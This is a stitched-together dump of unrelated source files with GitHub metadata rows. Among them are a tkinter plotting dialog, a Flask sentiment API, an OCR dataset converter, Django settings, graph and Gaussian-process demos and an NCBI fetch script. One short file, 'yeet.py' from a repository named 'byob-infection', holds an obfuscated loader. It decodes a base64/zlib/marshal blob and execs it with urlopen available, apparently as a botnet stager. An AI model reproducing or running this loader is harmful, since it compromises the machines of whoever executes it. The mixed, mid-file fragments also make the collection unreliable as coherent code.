self.dataCols.append(self.headers[zSelection[0]])
else:
self.dataCols.append(None)
colorSelection = self.colorMenu.curselection()
if len(colorSelection) > 0:
self.dataCols.append(self.headers[colorSelection[0]])
else:
self.dataCols.append(None)
sizeSelection = self.sizeMenu.curselection()
if len(sizeSelection) > 0:
self.dataCols.append(self.headers[sizeSelection[0]])
else:
self.dataCols.append(None)
def getdataCols(self):
return self.dataCols
class ClusterDialog(Dialog):
def __init__(self, parent, dataObject, title = None):
self.data = dataObject
self.headers = self.data.get_headers()
self.dataCols = []
self.numClusters = 0
Dialog.__init__(self, parent)
def body(self, master):
frame = tk.Frame(self)
frame2 = tk.Frame(self)
frame.pack(side=tk.LEFT)
label = tk.Label(frame, text="Choose Headers for Cluster Analysis", width=30)
self.headerList = tk.Listbox( frame, selectmode=tk.MULTIPLE, exportselection=0)
label.pack(side=tk.TOP, pady=5)
self.headerList.pack(side=tk.TOP, padx=5)
for header in self.headers:
self.headerList.insert(tk.END, header)
tk.Label(frame, text="How Many Clusters Do You Want?", width=30).pack(side=tk.TOP, pady=5)
self.numClustersEntry = tk.Entry(frame)
self.numClustersEntry.pack(side=tk.TOP, pady=5)
def apply(self):
selection = self.headerList.curselection()
if len(selection) > 0:
for item in selection:
self.dataCols.append(self.headers[item])
if self.numClustersEntry != None:
self.numClusters = self.numClustersEntry.get()
def getdataCols(self):
return self.dataCols
def getNumClusters(self):
return self.numClusters
class ClusterDialogPlot(Dialog):
def __init__(self, parent, dataObject, title = None):
self.data = dataObject
self.headers = self.data.get_original_headers()
self.dataCols = []
Dialog.__init__(self, parent)
def body(self, master):
frame = tk.Frame(self)
frame2 = tk.Frame(self)
frame.pack(side=tk.LEFT)
xLabel = tk.Label(frame, text="X", width=20)
yLabel = tk.Label(frame, text="Y", width=20)
zLabel = tk.Label(frame, text="Z", width=20)
sizeLabel = tk.Label(frame2, text="Size", width=20)
colorLabel = tk.Label(frame2, text="Color", width=20)
self.colorMenu = tk.Listbox( frame2, selectmode=tk.SINGLE, exportselection=0)
self.xMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
self.yMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
self.zMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
self.sizeMenu = tk.Listbox( frame2, selectmode=tk.SINGLE, exportselection=0)
xLabel.pack(side=tk.TOP, pady=5)
self.xMenu.pack(side=tk.TOP, padx=5)
yLabel.pack(side=tk.TOP, pady=5)
self.yMenu.pack(side=tk.TOP, padx=5)
zLabel.pack(side=tk.TOP, pady=5)
self.zMenu.pack(side=tk.TOP, padx=5)
frame2.pack(side=tk.RIGHT)
sizeLabel.pack(side=tk.TOP, pady=5)
self.sizeMenu.pack(side=tk.TOP, padx=5)
colorLabel.pack(side=tk.TOP, pady=5)
self.colorMenu.pack(side=tk.TOP, padx=5)
#color options
# for color in self.colors:
# self.colorMenu.insert(tk.END, color)
# for size in self.sizes:
# self.sizeMenu.insert(tk.END, size)
for header in self.headers:
self.xMenu.insert(tk.END, header)
self.yMenu.insert(tk.END, header)
self.zMenu.insert(tk.END, header)
self.colorMenu.insert(tk.END, header)
self.sizeMenu.insert(tk.END, header)
def apply(self):
xSelection = self.xMenu.curselection()
if len(xSelection) > 0:
self.dataCols.append(self.headers[xSelection[0]])
ySelection = self.yMenu.curselection()
if len(ySelection) > 0:
self.dataCols.append(self.headers[ySelection[0]])
zSelection = self.zMenu.curselection()
if len(zSelection) > 0:
self.dataCols.append(self.headers[zSelection[0]])
else:
self.dataCols.append(None)
colorSelection = self.colorMenu.curselection()
if len(colorSelection) > 0:
self.dataCols.append(self.headers[colorSelection[0]])
else:
self.dataCols.append(None)
sizeSelection = self.sizeMenu.curselection()
if len(sizeSelection) > 0:
self.dataCols.append(self.headers[sizeSelection[0]])
else:
self.dataCols.append(None)
def getdataCols(self):
return self.dataCols | [
"noreply@github.com"
] | eodecker.noreply@github.com |
e56c6ee27ab0950e3e1ce80a00944ec4b2b72b66 | dd137d2643ec983c60fc0e6c7c6e4d53778c6f92 | /yeet.py | 7f28ec17b139efd2653441120449f0871bec88f0 | [] | no_license | Dybe66/byob-infection | c2b98b3ce9a496712fb54f97902c1c5aa455b80b | 5e8354d5dd39eb57bd6d84b2dd72cc31a983aa15 | refs/heads/main | 2023-08-25T12:07:18.646529 | 2021-10-15T20:32:18 | 2021-10-15T20:32:18 | 417,626,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | import sys,zlib,base64,marshal,json,urllib
if sys.version_info[0] > 2:
from urllib import request
urlopen = urllib.request.urlopen if sys.version_info[0] > 2 else urllib.urlopen
exec(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWJgYCgtyskvSM3TUM8oKSmw0te3MNEzMjHXMzHVszS0MjQ2ttDXLy5JTE8tKtbPNzfSK6hU19QrSk1M0dAEAC22Eas=')))))
| [
"noreply@github.com"
] | Dybe66.noreply@github.com |
184bfebb357383b520e0be4fda111faf8a4b9ffa | e4fcd551a9d83e37a2cd6d5a2b53a3cc397ccb10 | /codes/eval_metrics/writing/mmocr/tools/dataset_converters/textdet/synthtext_converter.py | 811b1cc0e669b8dd185dbcf8156595002713a850 | [
"Apache-2.0"
] | permissive | eslambakr/HRS_benchmark | 20f32458a47c6e1032285b44e70cf041a64f842c | 9f153d8c71d1119e4b5c926b899bb556a6eb8a59 | refs/heads/main | 2023-08-08T11:57:26.094578 | 2023-07-22T12:24:51 | 2023-07-22T12:24:51 | 597,550,499 | 33 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,177 | py | # Copyright (c) OpenMMLab. All rights reserved.
import argparse
import json
import os.path as osp
import time
import lmdb
import mmcv
import mmengine
import numpy as np
from scipy.io import loadmat
from shapely.geometry import Polygon
from mmocr.utils import check_argument
def trace_boundary(char_boxes):
"""Trace the boundary point of text.
Args:
char_boxes (list[ndarray]): The char boxes for one text. Each element
is 4x2 ndarray.
Returns:
boundary (ndarray): The boundary point sets with size nx2.
"""
assert check_argument.is_type_list(char_boxes, np.ndarray)
# from top left to to right
p_top = [box[0:2] for box in char_boxes]
# from bottom right to bottom left
p_bottom = [
char_boxes[idx][[2, 3], :]
for idx in range(len(char_boxes) - 1, -1, -1)
]
p = p_top + p_bottom
boundary = np.concatenate(p).astype(int)
return boundary
def match_bbox_char_str(bboxes, char_bboxes, strs):
"""match the bboxes, char bboxes, and strs.
Args:
bboxes (ndarray): The text boxes of size (2, 4, num_box).
char_bboxes (ndarray): The char boxes of size (2, 4, num_char_box).
strs (ndarray): The string of size (num_strs,)
"""
assert isinstance(bboxes, np.ndarray)
assert isinstance(char_bboxes, np.ndarray)
assert isinstance(strs, np.ndarray)
bboxes = bboxes.astype(np.int32)
char_bboxes = char_bboxes.astype(np.int32)
if len(char_bboxes.shape) == 2:
char_bboxes = np.expand_dims(char_bboxes, axis=2)
char_bboxes = np.transpose(char_bboxes, (2, 1, 0))
if len(bboxes.shape) == 2:
bboxes = np.expand_dims(bboxes, axis=2)
bboxes = np.transpose(bboxes, (2, 1, 0))
chars = ''.join(strs).replace('\n', '').replace(' ', '')
num_boxes = bboxes.shape[0]
poly_list = [Polygon(bboxes[iter]) for iter in range(num_boxes)]
poly_box_list = [bboxes[iter] for iter in range(num_boxes)]
poly_char_list = [[] for iter in range(num_boxes)]
poly_char_idx_list = [[] for iter in range(num_boxes)]
poly_charbox_list = [[] for iter in range(num_boxes)]
words = []
for s in strs:
words += s.split()
words_len = [len(w) for w in words]
words_end_inx = np.cumsum(words_len)
start_inx = 0
for word_inx, end_inx in enumerate(words_end_inx):
for char_inx in range(start_inx, end_inx):
poly_char_idx_list[word_inx].append(char_inx)
poly_char_list[word_inx].append(chars[char_inx])
poly_charbox_list[word_inx].append(char_bboxes[char_inx])
start_inx = end_inx
for box_inx in range(num_boxes):
assert len(poly_charbox_list[box_inx]) > 0
poly_boundary_list = []
for item in poly_charbox_list:
boundary = np.ndarray((0, 2))
if len(item) > 0:
boundary = trace_boundary(item)
poly_boundary_list.append(boundary)
return (poly_list, poly_box_list, poly_boundary_list, poly_charbox_list,
poly_char_idx_list, poly_char_list)
def convert_annotations(root_path, gt_name, lmdb_name):
"""Convert the annotation into lmdb dataset.
Args:
root_path (str): The root path of dataset.
gt_name (str): The ground truth filename.
lmdb_name (str): The output lmdb filename.
"""
assert isinstance(root_path, str)
assert isinstance(gt_name, str)
assert isinstance(lmdb_name, str)
start_time = time.time()
gt = loadmat(gt_name)
img_num = len(gt['imnames'][0])
env = lmdb.open(lmdb_name, map_size=int(1e9 * 40))
with env.begin(write=True) as txn:
for img_id in range(img_num):
if img_id % 1000 == 0 and img_id > 0:
total_time_sec = time.time() - start_time
avg_time_sec = total_time_sec / img_id
eta_mins = (avg_time_sec * (img_num - img_id)) / 60
print(f'\ncurrent_img/total_imgs {img_id}/{img_num} | '
f'eta: {eta_mins:.3f} mins')
# for each img
img_file = osp.join(root_path, 'imgs', gt['imnames'][0][img_id][0])
img = mmcv.imread(img_file, 'unchanged')
height, width = img.shape[0:2]
img_json = {}
img_json['file_name'] = gt['imnames'][0][img_id][0]
img_json['height'] = height
img_json['width'] = width
img_json['annotations'] = []
wordBB = gt['wordBB'][0][img_id]
charBB = gt['charBB'][0][img_id]
txt = gt['txt'][0][img_id]
poly_list, _, poly_boundary_list, _, _, _ = match_bbox_char_str(
wordBB, charBB, txt)
for poly_inx in range(len(poly_list)):
polygon = poly_list[poly_inx]
min_x, min_y, max_x, max_y = polygon.bounds
bbox = [min_x, min_y, max_x - min_x, max_y - min_y]
anno_info = dict()
anno_info['iscrowd'] = 0
anno_info['category_id'] = 1
anno_info['bbox'] = bbox
anno_info['segmentation'] = [
poly_boundary_list[poly_inx].flatten().tolist()
]
img_json['annotations'].append(anno_info)
string = json.dumps(img_json)
txn.put(str(img_id).encode('utf8'), string.encode('utf8'))
key = b'total_number'
value = str(img_num).encode('utf8')
txn.put(key, value)
def parse_args():
parser = argparse.ArgumentParser(
description='Convert synthtext to lmdb dataset')
parser.add_argument('synthtext_path', help='synthetic root path')
parser.add_argument('-o', '--out-dir', help='output path')
args = parser.parse_args()
return args
# TODO: Refactor synthtext
def main():
args = parse_args()
synthtext_path = args.synthtext_path
out_dir = args.out_dir if args.out_dir else synthtext_path
mmengine.mkdir_or_exist(out_dir)
gt_name = osp.join(synthtext_path, 'gt.mat')
lmdb_name = 'synthtext.lmdb'
convert_annotations(synthtext_path, gt_name, osp.join(out_dir, lmdb_name))
if __name__ == '__main__':
main()
| [
"islam.bakr.2017@gmail.com"
] | islam.bakr.2017@gmail.com |
b5d2dfcb9f3112ebb0b00df7d97761018ff49903 | 255d4b618480144320a512099de9ce445e7885ee | /flask_serving/app.py | b22d7d50beb902f5c3088025586711e5e990d752 | [] | no_license | hyades910739/Bert-Sentiment-Classifier | 9430ddd3bf4b8cc602e3eed2a2a9cf315f990859 | e5f2725c9eef45638ce4cfbaeccf8eea32f1bacf | refs/heads/master | 2023-02-26T12:00:37.185038 | 2021-01-31T13:40:09 | 2021-01-31T13:40:09 | 334,664,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,687 | py | import flask
from flask import Flask
from flask import render_template, url_for, request
import sys
import time
from pre_process import get_token
import json
from config import BERT_URL, SENTIMENT_URL
from predict import get_sentiment_predict, get_bert_embedding
from crawler import get_raw_pushes_list_from_post, combine_user_push
app = Flask(__name__)
@app.route("/predict", methods=['GET', 'POST'])
def predict():
if request.method == 'POST':
data = request.get_json()
data = json.loads(data)
lines = data['lines']
if not lines:
return {
'message': 'no data found. should post a json with lines'
}
print(lines)
token = dict(get_token(lines))
embedding = get_bert_embedding(BERT_URL, token)
output = get_sentiment_predict(SENTIMENT_URL, embedding)
return {'output':output}
return {
'message': 'Post nothing.'
}
@app.route('/predict_ptt',methods=['GET', 'POST'])
def predict_ptt():
if request.method == 'POST':
data = request.get_json()
data = json.loads(data)
url = data['url']
posts = combine_user_push(get_raw_pushes_list_from_post(url))
contents = [i[2] for i in posts]
token = dict(get_token(contents))
embedding = get_bert_embedding(BERT_URL, token)
output = get_sentiment_predict(SENTIMENT_URL, embedding)
line_and_score = [
content + (score,) for content, score in zip(posts, output)
]
return {'output':line_and_score}
if __name__ == '__main__':
app.run(
host = '0.0.0.0',
port = 8938,
debug = True
)
| [
"ericlai@ericlaideMacBook-Pro.local"
] | ericlai@ericlaideMacBook-Pro.local |
a11e3bfc48930fad0830280da37c6ef706d754a2 | 778f80d2c449ea49596624607dc9ccb25aebc758 | /cap7/TestaAgmPrim.py | 43d5053d974ddd1d1e0ed7f27bdcc0d69b10e007 | [] | no_license | ProFL/TADGrafo_Python | aa7e46e31254643f1363c611cbe5c18c079bf09b | c018e886b2582b876cc97558a79fd92b083559d2 | refs/heads/master | 2021-08-23T18:20:46.861034 | 2017-12-06T01:48:17 | 2017-12-06T01:48:17 | 112,876,296 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 843 | py | ''' Módulo para testar o algoritmo de Primm '''
import sys
import os
sys.path.append(os.path.dirname(os.path.realpath(__file__)) + "/listaadj/autoreferencia")
from EntradaDeGrafo import EntradaDeGrafo
from Grafo import Grafo
from AgmPrim import AgmPrim
#pylint: disable=C0103
raiz = 2#int(input("Raiz da AGM:"))
# grafo = EntradaDeGrafo.digitarGrafo()
grafo = Grafo(6)
arestas = [[0, 1, 6],
[0, 2, 100],
[0, 3, 5],
[1, 2, 2],
[1, 4, 5],
[2, 3, 2],
[2, 4, 6],
[2, 5, 4],
[3, 5, 3],
[4, 5, 4]]
for aresta in arestas:
a = EntradaDeGrafo.converteAresta(aresta[0], aresta[1], aresta[2])
EntradaDeGrafo.insereArestaS(grafo, a.v1, a.v2, a.peso)
grafo.imprime()
agm = AgmPrim(grafo)
agm.obterAgm(raiz)
agm.imprime()
#pylint: enable=C0103
| [
"pedro-fiuza10@hotmail.com"
] | pedro-fiuza10@hotmail.com |
320129562399e4ff93138bb8e0fc870add4138a7 | 423dc2cbdbb099d8b1031886fd64f1680cf06ccc | /src/ej5.py | ce4af8915ecd53b15d68712ae43bd0924204ca02 | [] | no_license | javicorvi/python_examples | 793b03dfbf275d14d12be51373f37dd98ebf44dd | 2292619d13445a051bd951a933b9d9e30d690923 | refs/heads/master | 2021-06-09T21:31:25.922912 | 2017-01-02T18:35:45 | 2017-01-02T18:35:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,936 | py | # ---------------------------------------------------------------------------- #
# coding=utf-8
# ---------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------- #
# imports
import httplib, urllib
import xml.etree.ElementTree as ET
# ---------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------- #
# Crea la conexion
#conn = httplib.HTTPSConnection("eutils.ncbi.nlm.nih.gov")
# Hace la consulta
#conn.request("GET", "/entrez/eutils/esearch.fcgi?db=Nuccore&term=HUMAN")
params = urllib.urlencode({'db': 'nuccore','term':'Junin+Virus[orgn]','retmax':1000})
conn = httplib.HTTPSConnection("eutils.ncbi.nlm.nih.gov")
conn.request("POST", "/entrez/eutils/esearch.fcgi", params )
# ---------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------- #
# Obtiene la respuesta
r1 = conn.getresponse()
# Verifica que la respuesta es correcta
if not r1.status == 200 :
print "Error en la conexión: " + r1.status + " " + r1.reason
exit()
# Lee el contenido de la respuesta
response = r1.read()
print response
docXml = ET.fromstring(response)
for f in docXml.find("IdList").findall("Id") :
print "ID {:15} ".format(f.text)
params = urllib.urlencode({'db':'nuccore','retmode':'xml','id':f.text})
conn2 = httplib.HTTPSConnection("eutils.ncbi.nlm.nih.gov")
conn2.request("POST", "/entrez/eutils/efetch.fcgi", params )
rf = conn2.getresponse()
if not rf.status == 200 :
print "Error en la conexión: " + rf.status + " " + rf.reason
exit()
response_efetch = rf.read()
print response_efetch
docXml_f = ET.fromstring(response_efetch)
pubMed = docXml_f.find("GBSeq/GBSeq_references/GBReference/GBReference_pubmed").text
print pubMed
params = urllib.urlencode({'db':'pubmed','rettype':'abstract','retmode':'txt','id':pubMed})
conn3 = httplib.HTTPSConnection("eutils.ncbi.nlm.nih.gov")
conn3.request("POST", "/entrez/eutils/efetch.fcgi", params )
rpub = conn3.getresponse()
if not rpub.status == 200 :
print "Error en la conexión: " + rpub.status + " " + rpub.reason
exit()
response_pubmed = rpub.read()
print response_pubmed
rpub.close
conn3.close()
rf.close
conn2.close()
save_file = open("my_junin_virus.xml", "w")
save_file.write(response)
save_file.close()
r1.close
# Cierra la conexion
conn.close()
#print docXml.find("Count").text
# Fin de la consulta
#print "{:15} {:45} {:10} ".format(docXml.find("eSearchResult/Count").text, docXml.find("eSearchResult/From").text, docXml.find("eSearchResult/To").text)
| [
"javicorvi@gmail.com"
] | javicorvi@gmail.com |
dba9826fd017a5155e4aeb88ce6828001cac6adb | f4a4c9a68a4ead50c0882832f3f73b9cb29271f6 | /backend/cardgameapp_22189/settings.py | 5d1e2e15e8ab4ff8efd7b0549a39e0e1e23558cb | [] | no_license | crowdbotics-apps/cardgameapp-22189 | 276e0c18661a3e1ae474f2deb11b6fc32b66eb38 | 200ca6880781d3d832be39f44b8aa290db481ec2 | refs/heads/master | 2023-01-11T11:45:35.488695 | 2020-11-01T17:50:20 | 2020-11-01T17:50:20 | 309,153,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,111 | py | """
Django settings for cardgameapp_22189 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.contrib.sites",
"course",
]
LOCAL_APPS = [
"home",
"users.apps.UsersConfig",
]
THIRD_PARTY_APPS = [
"rest_framework",
"rest_framework.authtoken",
"rest_auth",
"rest_auth.registration",
"bootstrap4",
"allauth",
"allauth.account",
"allauth.socialaccount",
"allauth.socialaccount.providers.google",
"django_extensions",
"drf_yasg",
# start fcm_django push notifications
"fcm_django",
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "cardgameapp_22189.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "cardgameapp_22189.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {"default": env.db()}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = "/static/"
MIDDLEWARE += ["whitenoise.middleware.WhiteNoiseMiddleware"]
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")]
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = "email"
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning(
"You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails."
)
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
17584929153323757012d9c8a5981b6d6497d4ad | ef46379a8f1576bc6a0bb21c46126a1ce404f029 | /105thick/makerandom.py | a733fe42bc8e5bda636c554618c5c48e33db3764 | [] | no_license | xiaodongli1986/LSS_xis | 534baa2bd4405799d77d95374e1ae9e0d4ae64ae | 60d4d171654625ad359c24bda97d37f588b36a9d | refs/heads/master | 2020-04-12T06:40:38.405152 | 2017-04-29T07:59:01 | 2017-04-29T07:59:01 | 63,673,203 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py |
import random
nran = 15028085*30
nowf=open('random.xyzw', 'w')
for i in range(nran):
x,y = random.uniform(0,3150), random.uniform(0,3150)
nowf.write(str(x)+' '+str(y)+' 0 1\n')
nowf.close()
| [
"xiaodongli@kias.re.kr"
] | xiaodongli@kias.re.kr |
e6ff826e900d179f149b994ff4de5462b627cff7 | 7211f6e8b854175e6d2c29fe364f6eac224b2f56 | /gpapp2.py | 8d9210f4b96a4c79073bc0fe3c3c8d8b8687f170 | [] | no_license | jimparr19/gaussianprocess.python | c340572801717d76c56888338f9fda5fbd8d83c1 | a2d0a38412691d85c42504330f68d3f88e38510a | refs/heads/master | 2020-04-06T07:11:30.282345 | 2016-09-14T22:07:18 | 2016-09-14T22:07:18 | 63,553,292 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,955 | py | import numpy as np
from bokeh.models import ColumnDataSource, TapTool, Circle
from bokeh.plotting import figure, curdoc
from bokeh.models.widgets import Slider
from bokeh.layouts import row, widgetbox
min_x = -3
max_x = 3
min_y = -5
max_y = 5
length_scale = Slider(title="length_scale", value=1.0, start=0.01, end=2.0, step=0.01)
power = Slider(title="power", value=2.0, start=1.0, end=3.0, step=0.1)
regression = Slider(title="regression", value=0.0, start=0.0, end=0.1, step=0.001)
l = length_scale.value
p_l = power.value
r = regression.value
xi = np.linspace(min_x, max_x, 100)
yi = np.linspace(min_y, max_y, 100)
xv, yv = np.meshgrid(xi, yi)
x_grid = xv.flatten()
y_grid = yv.flatten()
n = 50
x = np.linspace(min_x, max_x, n)
mu = np.zeros(n)
sigma_test = np.zeros((n,n))
for i in range(len(x)):
for j in range(len(x)):
sigma_test[i,j] = np.exp(-0.5 * (np.abs(x[i] - x[j])/l) ** p_l)
#sigma_test = sigma_test + r*np.eye(n)
err = sigma_test.diagonal()
upper_limit = mu + 1.95*err
lower_limit = mu - 1.95*err
band_x = np.append(x, x[::-1]).tolist()
band_y = np.append(lower_limit, upper_limit[::-1]).tolist()
TOOLS="reset"
# create the scatter plot
p = figure(tools=TOOLS, plot_width=800, plot_height=600, min_border=10, min_border_left=50,
toolbar_location="above", title="GP updates")
p.background_fill_color = "#fafafa"
s1 = ColumnDataSource(data = dict(x=x_grid, y=y_grid))
s2 = ColumnDataSource(data = dict(x=[], y=[]))
s3 = ColumnDataSource(data = dict(x=x, y=mu, band_x=band_x, band_y=band_y))
r1 = p.circle(x='x', y='y', source=s1, line_color=None, fill_color=None, size=10, name="mycircle")
selected_circle = Circle(line_color=None, fill_color=None)
nonselected_circle = Circle(line_color=None, fill_color=None)
renderer = p.select(name="mycircle")
renderer.selection_glyph = selected_circle
renderer.nonselection_glyph = nonselected_circle
tap_tool = TapTool(renderers=[r1])
p.tools.append(tap_tool)
r2 = p.circle(x='x',y='y', source=s2, line_color='#d3d3d3', fill_color='#d3d3d3', size=10)
r3 = p.line(x='x',y='y', source=s3)
p.patch(x='band_x', y='band_y', source=s3, color='#d3d3d3', alpha=0.5)
ds = r2.data_source
gp = r3.data_source
def update_data(attr, old, new):
l = length_scale.value
p_l = power.value
r = regression.value
sigma_test = np.zeros((n, n))
for i in range(len(x)):
for j in range(len(x)):
sigma_test[i, j] = np.exp(-0.5 * (np.abs(x[i] - x[j])/l) ** p_l)
#sigma_test = sigma_test + r * np.eye(n)
inds = new['1d']['indices']
if inds != []:
new_data = dict()
new_data['x'] = ds.data['x'] + [x_grid[inds[0]]]
new_data['y'] = ds.data['y'] + [y_grid[inds[0]]]
ds.data = new_data
x_obs = np.array(new_data['x'])
y_obs = np.array(new_data['y'])
sigma_train = np.zeros((len(x_obs), len(x_obs)))
for i in range(len(x_obs)):
for j in range(len(x_obs)):
sigma_train[i, j] = np.exp(-0.5 * (np.abs(x_obs[i] - x_obs[j])/l) ** p_l)
sigma_train = sigma_train + r * np.eye(len(x_obs))
sigma_train_test = np.zeros((len(x_obs), len(x)))
for i in range(len(x_obs)):
for j in range(len(x)):
sigma_train_test[i, j] = np.exp(-0.5 * (np.abs(x_obs[i] - x[j])/l) ** p_l)
sigma_test_train = np.zeros((len(x), len(x_obs)))
for i in range(len(x)):
for j in range(len(x_obs)):
sigma_test_train[i, j] = np.exp(-0.5 * (np.abs(x[i] - x_obs[j])/l) ** p_l)
phi = sigma_test_train.dot(np.linalg.inv(sigma_train))
pred = phi.dot(y_obs)
cov = sigma_test - phi.dot(sigma_train_test)
err = cov.diagonal()
upper_limit = pred + 1.95*err
lower_limit = pred - 1.95*err
band_x = np.append(x, x[::-1]).tolist()
band_y = np.append(lower_limit, upper_limit[::-1]).tolist()
gp_data = dict()
gp_data['x'] = x.tolist()
gp_data['y'] = pred.tolist()
gp_data['band_x'] = band_x
gp_data['band_y'] = band_y
gp.data = gp_data
def update_slider(attr, old, new):
l = length_scale.value
p_l = power.value
r = regression.value
sigma_test = np.zeros((n, n))
for i in range(len(x)):
for j in range(len(x)):
sigma_test[i, j] = np.exp(-0.5 * (np.abs(x[i] - x[j])/l) ** p_l)
#sigma_test = sigma_test + r * np.eye(n)
x_obs = ds.data['x']
y_obs = ds.data['y']
sigma_train = np.zeros((len(x_obs), len(x_obs)))
for i in range(len(x_obs)):
for j in range(len(x_obs)):
sigma_train[i, j] = np.exp(-0.5 * (np.abs(x_obs[i] - x_obs[j])/l) ** p_l)
sigma_train = sigma_train + r * np.eye(len(x_obs))
sigma_train_test = np.zeros((len(x_obs), len(x)))
for i in range(len(x_obs)):
for j in range(len(x)):
sigma_train_test[i, j] = np.exp(-0.5 * (np.abs(x_obs[i] - x[j])/l) ** p_l)
sigma_test_train = np.zeros((len(x), len(x_obs)))
for i in range(len(x)):
for j in range(len(x_obs)):
sigma_test_train[i, j] = np.exp(-0.5 * (np.abs(x[i] - x_obs[j])/l) ** p_l)
phi = sigma_test_train.dot(np.linalg.inv(sigma_train))
pred = phi.dot(y_obs)
cov = sigma_test - phi.dot(sigma_train_test)
